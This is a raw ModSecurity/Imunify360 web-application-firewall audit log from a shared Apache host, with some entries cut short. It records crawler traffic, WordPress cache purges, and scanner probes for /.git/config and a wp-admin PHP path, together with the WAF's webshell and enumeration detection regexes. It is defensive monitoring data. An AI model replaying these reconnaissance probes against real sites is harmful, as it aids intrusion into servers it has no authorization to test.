aGOe7Tw8s59ZJO7QhWywGAAAACA 20.171.207.232 42434 192.168.74.40 443 --9c0bad2c-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-udaipur/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --9c0bad2c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9c0bad2c-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-udaipur/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-udaipur/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359213344803 15095 (- - -) Stopwatch2: 1751359213344803 15095; combined=2610, p1=124, p2=2360, p3=0, p4=0, p5=126, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9c0bad2c-Z-- --75e2273f-A-- [01/Jul/2025:14:10:13.817500 +0530] aGOe7fI4K7rYc9V0-PEjrgAAABA 162.243.75.54 58334 192.168.74.40 443 --75e2273f-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --75e2273f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --75e2273f-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359213764358 53347 (- - -) Stopwatch2: 1751359213764358 53347; combined=3309, p1=99, p2=3073, p3=0, p4=0, p5=137, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --75e2273f-Z-- --4a48e531-A-- [01/Jul/2025:14:10:14.514520 +0530] aGOe7jw8s59ZJO7QhWywGQAAACA 20.171.207.232 42434 192.168.74.40 443 --4a48e531-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/js/aainag/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --4a48e531-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4a48e531-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/js/aainag/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/js/aainag/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-ahmedabad/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359214500201 14602 (- - -) -- Message: Pattern match "(wlwmanifest\\.xml|readme\\.txt|changelog\\.(md|txt)|lang_upload\\.php|arm_widgets_js\\.js|__\\sUPDATES.txt|wpuef-configurator.js)" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1822"] [id "77350207"] [msg "IM360 WAF: WordPress plugins/themes version enumeration||RSV:7.05||RS:302||T:APACHE||REQUEST_URI:/wp-content/plugins/litespeed-cache/readme.txt||"] [severity "NOTICE"] [tag "wp_core"] Stopwatch: 1751359547149629 6364 (- - -) Stopwatch2: 1751359547149629 6364; combined=4563, p1=97, p2=4221, p3=89, p4=2, p5=154, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e43f2778-Z-- --a58ca820-A-- [01/Jul/2025:14:15:47.664172 +0530] aGOgOuwZi3kMyoeJ-JpqOAAAAAY 103.185.74.40 56398 192.168.74.40 443 --a58ca820-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a58ca820-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a58ca820-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359546368187 1296311 (- - -) Stopwatch2: 1751359546368187 1296311; combined=2279, p1=70, p2=2010, p3=0, p4=0, p5=199, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a58ca820-Z-- --8c3e4f5f-A-- [01/Jul/2025:14:15:48.611439 +0530] aGOgPIRHp8r7UogtWrscDgAAAEA 20.171.207.232 48242 192.168.74.40 443 --8c3e4f5f-B-- GET /https/aainag/images/testimonials/https/js/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/aainag/payment-mode.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8c3e4f5f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8c3e4f5f-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359548597150 14571 (- - -) Stopwatch2: 1751359548597150 14571; combined=2596, p1=105, p2=2302, p3=0, p4=0, p5=189, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8c3e4f5f-Z-- --94d47035-A-- [01/Jul/2025:14:15:49.081022 +0530] aGOgO0COaY49Xlnpc2xXmgAAACY 103.185.74.40 12709 192.168.74.40 443 --94d47035-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --94d47035-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --94d47035-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359547874316 1207117 (- - -) Stopwatch2: 1751359547874316 1207117; combined=2109, p1=85, p2=1848, p3=0, p4=0, p5=176, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --94d47035-Z-- --6f261475-A-- [01/Jul/2025:14:15:49.330910 +0530] aGOgPRWscEYPCNueUfZhWQAAAC4 57.141.0.24 45766 192.168.74.40 443 --6f261475-B-- GET /rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-delhi/rajasthan-tours-from-agra/images/testimonials/Travel-Tips.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --6f261475-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6f261475-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751360418352718 15936 (- - -) Stopwatch2: 1751360418352718 15936; combined=2547, p1=134, p2=2278, p3=0, p4=0, p5=135, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b6e22648-Z-- --7dd91c0f-A-- [01/Jul/2025:14:30:19.312045 +0530] aGOjoj73sznzUv3KDis9kQAAABM 103.185.74.40 27222 192.168.74.40 443 --7dd91c0f-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --7dd91c0f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --7dd91c0f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751360418245886 1066785 (- - -) Stopwatch2: 1751360418245886 1066785; combined=2337, p1=86, p2=2093, p3=0, p4=0, p5=157, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7dd91c0f-Z-- --d73b0e7f-A-- [01/Jul/2025:14:30:19.548594 +0530] aGOjo_KWq6rZjpBBgPkz1wAAAAM 20.171.207.232 60084 192.168.74.40 443 --d73b0e7f-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/js/Rajasthan-Travel-Guides/images/https/aainag/hotels-jodhpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d73b0e7f-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751360420657731 14891 (- - -) Stopwatch2: 1751360420657731 14891; combined=3173, p1=125, p2=2885, p3=0, p4=0, p5=162, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c4bdf46d-Z-- --415c9a36-A-- [01/Jul/2025:14:30:20.714191 +0530] aGOjo126-3NSqC00saN8YwAAADE 103.185.74.40 27175 192.168.74.40 443 --415c9a36-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --415c9a36-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --415c9a36-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751360419524584 1190216 (- - -) Stopwatch2: 1751360419524584 1190216; combined=3117, p1=142, p2=2816, p3=0, p4=0, p5=159, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --415c9a36-Z-- --caf23b06-A-- [01/Jul/2025:14:30:21.261330 +0530] aGOjpdpplWEvvdnrQEfpMgAAAB4 216.24.210.106 37967 192.168.74.40 443 --caf23b06-B-- GET /wp-admin/includes/index.php HTTP/1.1 Host: anandamsanyal.com User-Agent: Go-http-client/1.1 Referer: http://anandamsanyal.com/wp-admin/includes/index.php Accept-Encoding: gzip --caf23b06-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361465358316 19815 (- - -) Stopwatch2: 1751361465358316 19815; combined=4402, p1=199, p2=4045, p3=0, p4=0, p5=158, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9451d42d-Z-- --af8c4f17-A-- [01/Jul/2025:14:47:46.389239 +0530] aGOnus_bYat-bZ6TBnhWCQAAAA0 103.185.74.40 13380 192.168.74.40 443 --af8c4f17-B-- POST /wp-cron.php?doing_wp_cron=1751361466.1595849990844726562500 HTTP/1.1 Host: wordpress.taaffeite.co User-Agent: WordPress/6.8.1; https://wordpress.taaffeite.co Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --af8c4f17-C-- --af8c4f17-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --af8c4f17-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751361466.1595849990844726562500& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361466372378 17087 (- - -) Stopwatch2: 1751361466372378 17087; combined=5806, p1=157, p2=4927, p3=183, p4=3, p5=536, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --af8c4f17-Z-- --a429be1b-A-- [01/Jul/2025:14:47:47.634962 +0530] aGOnu8_bYat-bZ6TBnhWDQAAAA0 122.169.186.221 64649 192.168.74.40 443 --a429be1b-B-- GET /assets/js/appear.js HTTP/1.1 Host: blackmasti.in Sec-Fetch-Site: same-origin Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Mode: no-cors Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/374.0.773146746 Mobile/15E148 Safari/604.1 Referer: https://blackmasti.in/?srsltid=AfmBOoqseXyIY0qw-KUGdwZtkcxUsQlMMwoIp-JDq81e3qfevzr_KLbA Sec-Fetch-Dest: script Accept-Language: en-IN,en;q=0.9 --a429be1b-F-- HTTP/1.1 200 OK Last-Modified: Mon, 04 Oct 2021 19:38:28 GMT -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --648e5652-Z-- --81e0da07-A-- [01/Jul/2025:14:49:36.075054 +0530] aGOoKMFvfMQml3zxomaWqwAAACg 35.203.210.224 60214 192.168.74.40 80 --81e0da07-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com Accept-Encoding: gzip --81e0da07-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --81e0da07-H-- Message: Access denied with code 403 (phase 1). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "121"] [id "77350470"] [msg "IM360 WAF: Vulnerability scanner detected||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 1) Apache-Handler: default-handler Stopwatch: 1751361576072835 2464 (- - -) Stopwatch2: 1751361576072835 2464; combined=486, p1=108, p2=0, p3=0, p4=0, p5=378, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --81e0da07-Z-- --daf6fa46-A-- [01/Jul/2025:14:49:36.231071 +0530] aGOoKMoLkJ8gQ_8oc2rUaQAAAA4 20.171.207.232 46014 192.168.74.40 443 --daf6fa46-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/Rajasthan-Travel-Guides/https/images/js/https/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --daf6fa46-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --daf6fa46-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/Rajasthan-Travel-Guides/https/images/js/https/hotels-in-rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/Rajasthan-Travel-Guides/https/images/js/https/hotels-in-rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-ahmedabad/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361576216231 15020 (- - -) Stopwatch2: 1751361576216231 15020; combined=2812, p1=124, p2=2559, p3=0, p4=0, p5=128, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361617380337 17080 (- - -) Stopwatch2: 1751361617380337 17080; combined=3228, p1=151, p2=2927, p3=0, p4=0, p5=150, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5ed74810-Z-- --80973e6a-A-- [01/Jul/2025:14:50:18.139504 +0530] aGOoUBy6sYRnaXXSs7KfWQAAABo 103.185.74.40 52202 192.168.74.40 443 --80973e6a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --80973e6a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --80973e6a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361616573457 1567045 (- - -) Stopwatch2: 1751361616573457 1567045; combined=2351, p1=87, p2=2031, p3=0, p4=0, p5=232, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --80973e6a-Z-- --8a7c5760-A-- [01/Jul/2025:14:50:18.597173 +0530] aGOoUsoLkJ8gQ_8oc2rUjQAAAA4 20.171.207.232 52136 192.168.74.40 443 --8a7c5760-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/Rajasthan-Travel-Guides/aainag/aainag/Car-Rentals-Delhi.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8a7c5760-F-- -- Action: Intercepted (phase 2) Stopwatch: 1751361619309936 5934 (- - -) Stopwatch2: 1751361619309936 5934; combined=1716, p1=148, p2=877, p3=0, p4=0, p5=691, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --43abe907-Z-- --79d8a36a-A-- [01/Jul/2025:14:50:19.385981 +0530] aGOoUqKsWTqEX-__bOWT3gAAAB4 103.185.74.40 54917 192.168.74.40 443 --79d8a36a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --79d8a36a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --79d8a36a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: 